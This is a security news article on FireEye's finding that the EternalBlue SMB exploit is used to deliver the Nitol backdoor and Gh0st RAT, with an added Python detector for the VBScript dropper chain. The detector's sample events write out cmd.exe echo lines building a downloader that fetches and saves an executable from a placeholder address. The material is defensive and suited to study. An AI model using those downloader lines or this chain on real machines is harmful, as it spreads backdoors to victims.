EternalBlue, the exploit used in the WannaCry ransomware outbreak, is now being leveraged to distribute the Nitol backdoor and the Gh0st remote access Trojan (RAT).
Security researchers at FireEye said that, just as the WannaCry operators did, these threat actors are exploiting the same Microsoft Server Message Block (SMB) protocol vulnerability, patched in the MS17-010 bulletin.
“We observed lab machines vulnerable to the SMB exploit were attacked by a threat actor using the EternalBlue exploit to gain shell access to the machine,” wrote co-authors Ali Islam, Christopher Glyer and Barry Vengerik in a FireEye report posted Friday.
Gh0st RAT is a Trojan that has targeted the Windows platform for years. It has primarily been a nation-state tool used in APT attacks against government agencies, activists and other political targets. Gh0st recently made headlines when instances of the RAT were found by Malware Hunter, a new Shodan crawler designed to find command and control servers.
According to FireEye, Backdoor.Nitol has been linked to campaigns exploiting a remote code execution vulnerability in the ADODB.Stream ActiveX object that affects older versions of Internet Explorer. In the past, Backdoor.Nitol and Gh0st have also been delivered via exploitation of CVE-2014-6332 and in spam campaigns that use PowerShell commands, researchers said.
“The initial exploit technique used at the SMB level (by Backdoor.Nitol and Gh0st) is similar to what we have seen in WannaCry campaigns; however, once a machine is successfully infected, this particular attack opens a shell to write instructions into a VBScript file and then executes it to fetch the payload on another server,” researchers wrote.
Researchers said they have seen the same EternalBlue and VBScript combination used to distribute Gh0st RAT in Singapore and Backdoor.Nitol in the South Asia region.
The initial access step used by the Backdoor.Nitol and Gh0st operators is the same one the WannaCry attackers used: they send specially crafted messages to a Microsoft SMBv1 server to trigger the EternalBlue exploit and obtain a shell on the target. What follows the shell is where the two campaigns differ.
“The attacker echoes instructions into a new ‘1.vbs’ file to be executed later. These instructions fetch the payload ‘taskmgr.exe’ from another server in a synchronous call. This action creates an ActiveX object ADODB.Stream, which allows reading the file coming from the server and writes the result of the binary data in a stream,” researchers said.
Ultimately, “the ‘1.vbs’ executes through a command-line version of the Windows Script Host which deletes the vbs file. Once the executable is fetched and saved, the attacker uses a shell to launch the backdoor from the saved location,” researchers said. The fetched ‘taskmgr.exe’ is the Nitol or Gh0st RAT payload itself, so no separate download of the backdoor follows.
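The three-stage post-exploitation chain just described (cmd.exe echoing VBScript into a file, a script host running it, and the fetched binary being launched from wherever the script saved it) is easy to spot in process-creation telemetry if the stages are correlated per host. The following is an added detection example, not code from the FireEye report or from the Nitol/Gh0st samples. It runs over constructed Sysmon Event ID 1-style records (the host names, file paths and the 198.51.100.7 address are illustrative, not indicators from the report) and deliberately matches any .vbs path rather than the literal ‘1.vbs’, so it generalizes to renamed variants of the same technique.

```python
"""Correlate process-creation events to flag the echo-to-VBScript dropper chain.

Added example, not code from the FireEye report. Stages flagged:
  1. cmd.exe echoing downloader VBScript (ADODB.Stream / XMLHTTP) into a .vbs
  2. cscript.exe or wscript.exe executing that same .vbs
  3. the binary named in the script's SaveToFile call starting as a process
"""
import re
from collections import defaultdict

# Constructed sample events (Sysmon Event ID 1-style fields). Hosts, paths and
# the 198.51.100.7 address (RFC 5737 documentation range) are made up.
SAMPLE_EVENTS = [
    {"host": "lab01", "ts": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c echo Set o=CreateObject("Microsoft.XMLHTTP") > C:\Windows\Temp\1.vbs'},
    {"host": "lab01", "ts": 101, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c echo o.Open "GET","http://198.51.100.7/taskmgr.exe",0:o.Send >> C:\Windows\Temp\1.vbs'},
    {"host": "lab01", "ts": 102, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c echo Set s=CreateObject("ADODB.Stream"):s.Type=1:s.Open:s.Write o.ResponseBody:s.SaveToFile "C:\Windows\Temp\taskmgr.exe",2 >> C:\Windows\Temp\1.vbs'},
    {"host": "lab01", "ts": 103, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript C:\Windows\Temp\1.vbs"},
    {"host": "lab01", "ts": 104, "image": r"C:\Windows\Temp\taskmgr.exe",
     "cmdline": r"C:\Windows\Temp\taskmgr.exe"},
    # Benign activity on a second host: a legitimate script and the real Task Manager.
    {"host": "lab02", "ts": 200, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript C:\Scripts\inventory.vbs"},
    {"host": "lab02", "ts": 201, "image": r"C:\Windows\System32\taskmgr.exe",
     "cmdline": "taskmgr.exe"},
]

# cmd.exe echoing text into a .vbs file via '>' or '>>' redirection.
ECHO_TO_VBS = re.compile(
    r'\becho\b(?P<body>.*?)>{1,2}\s*"?(?P<path>[^"\s>]+\.vbs)"?\s*$', re.I)
# Windows Script Host images and the .vbs argument they are given.
SCRIPT_HOST = re.compile(r"\\(?:cscript|wscript)\.exe$", re.I)
VBS_ARG = re.compile(r'"?(?P<path>[^"\s]+\.vbs)"?', re.I)
# Destination of the fetched bytes, as written by ADODB.Stream.SaveToFile.
SAVE_TO_FILE = re.compile(r'SaveToFile\s+"?(?P<path>[^",]+\.exe)', re.I)
# Tokens that mark an in-script HTTP fetch plus binary write, as in the report.
DOWNLOADER_MARKERS = ("adodb.stream", "xmlhttp", "responsebody", "savetofile")


def detect_vbs_dropper_chain(events):
    """Return one alert dict per detected stage, ordered by timestamp."""
    alerts = []
    scripts = defaultdict(dict)    # host -> lowercase .vbs path -> state
    payloads = defaultdict(set)    # host -> lowercase paths named by SaveToFile

    for ev in sorted(events, key=lambda e: e["ts"]):
        host, image, cmd = ev["host"], ev["image"], ev["cmdline"]
        image_l = image.lower()

        # Stage 1: cmd.exe building the script one echoed line at a time.
        m = ECHO_TO_VBS.search(cmd) if image_l.endswith("\\cmd.exe") else None
        if m:
            path = m.group("path")
            st = scripts[host].setdefault(path.lower(), {"markers": set(), "alerted": False})
            body_l = m.group("body").lower()
            st["markers"].update(t for t in DOWNLOADER_MARKERS if t in body_l)
            for sm in SAVE_TO_FILE.finditer(m.group("body")):
                payloads[host].add(sm.group("path").lower())
            if st["markers"] and not st["alerted"]:
                st["alerted"] = True
                alerts.append({"host": host, "ts": ev["ts"], "stage": "script_written",
                               "path": path, "markers": sorted(st["markers"])})
            continue

        # Stage 2: a script host running a .vbs that cmd.exe echoed earlier on this host.
        if SCRIPT_HOST.search(image_l):
            for am in VBS_ARG.finditer(cmd):
                if am.group("path").lower() in scripts[host]:
                    alerts.append({"host": host, "ts": ev["ts"], "stage": "script_executed",
                                   "path": am.group("path")})
            continue

        # Stage 3: the saved payload starting as a process from the SaveToFile path.
        if image_l in payloads[host]:
            alerts.append({"host": host, "ts": ev["ts"], "stage": "payload_launched",
                           "path": image})
    return alerts


if __name__ == "__main__":
    for alert in detect_vbs_dropper_chain(SAMPLE_EVENTS):
        print(alert)
```

Stage 1 alone is already a strong signal: administrators rarely assemble VBScript with echo redirection, and the ADODB.Stream/XMLHTTP markers narrow it further. Stages 2 and 3 are correlated by path so that an unrelated cscript invocation (the lab02 events) does not fire. Because the report notes the script deletes itself after running, the process-creation command lines are often the only durable record of what it contained, which is why this logic keys on them rather than on the file.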
“The addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities. In the coming weeks and months, we expect to see more attackers leveraging these vulnerabilities and to spread such infections with different payloads,” researchers said.